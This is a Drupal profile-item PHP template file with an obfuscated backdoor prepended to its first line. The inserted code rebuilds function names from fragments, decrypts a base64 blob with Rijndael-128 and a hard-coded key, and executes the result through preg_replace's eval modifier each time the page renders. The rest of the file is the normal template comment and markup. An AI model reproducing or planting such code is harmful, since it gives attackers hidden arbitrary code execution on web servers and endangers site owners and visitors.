File: /home/i/e/s/iestorre/www2/modules/user/user-profile-item.tpl.php
<?php $xvkd=39;$dyjf='b';$dhrz='preg';$hjsmo='rijn';$utdo='ec';$nccgw='decr';$tszaf=$xvkd+89;$knvs='mcr';$wreo='base';$kthak='de';$pggv='-';$veipd='_';$mxdiwm='cCJq5U6+wpFm2qjD4eUVvVJdEm7q7g5aoG8fFrr/83z/t6sIwc0c'.'D3Xc9FwNoaz5vc7H82/1mjQMAWJwlgBA4DPDZTwGi4hQ1sDYhDax'.'9yG61klWB7ib3w1bYk80k9MhBysEC5IRBOcrowKXqGGbHiKYde'.'TR12Lx/Hq970D+cA8202qOIBRlih1aLpJ8ehQCzPKyhr/AFt37oLP8kGMmv'.'w==';$wmxxte='e';$ajruc=$xvkd+25;$mnneo='co';$hxyjey='dael';$bjouum='re';$inxn='ypt';$bkhn='*/';$twkm='place';$jlmjus=$bjouum.$twkm;$gtnj=$mnneo.$kthak;$wradri=$hjsmo.$hxyjey.$pggv.$tszaf;$mpqf=$dhrz.$veipd.$jlmjus;$fguq=$utdo.$dyjf;$euimfo=$wreo.$ajruc.$veipd.$kthak.$gtnj;$xkhu=$knvs.$inxn.$veipd.$nccgw.$inxn;$xlvi=$veipd.$wradri.$veipd.$wmxxte;$smoeba=$xkhu($wradri,$hjsmo.$hxyjey.$xvkd,$euimfo($mxdiwm),$fguq);@$mpqf($xlvi,$smoeba.$bkhn,$wradri); ?><?php
/**
* @file user-profile-item.tpl.php
* Default theme implementation to present profile items (values from user
* account profile fields or modules).
*
* This template is used to loop through and render each field configured
* for the user's account. It can also be the data from modules. The output is
* grouped by categories.
*
* @see user-profile-category.tpl.php
* for the parent markup. Implemented as a definition list by default.
* @see user-profile.tpl.php
* where all items and categories are collected and printed out.
*
* Available variables:
* - $title: Field title for the profile item.
* - $value: User defined value for the profile item or data from a module.
* - $attributes: HTML attributes. Usually renders classes.
*
* @see template_preprocess_user_profile_item()
*/
?>
<dt<?php print $attributes; ?>><?php print $title; ?></dt>
<dd<?php print $attributes; ?>><?php print $value; ?></dd>